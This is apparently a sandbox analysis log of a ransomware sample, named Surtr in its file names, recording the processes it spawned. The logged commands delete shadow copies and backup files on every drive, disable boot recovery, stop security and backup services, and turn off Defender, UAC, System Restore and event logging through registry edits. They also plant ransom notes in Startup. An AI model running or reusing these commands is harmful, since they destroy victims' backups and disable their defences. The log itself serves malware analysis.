C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵
-
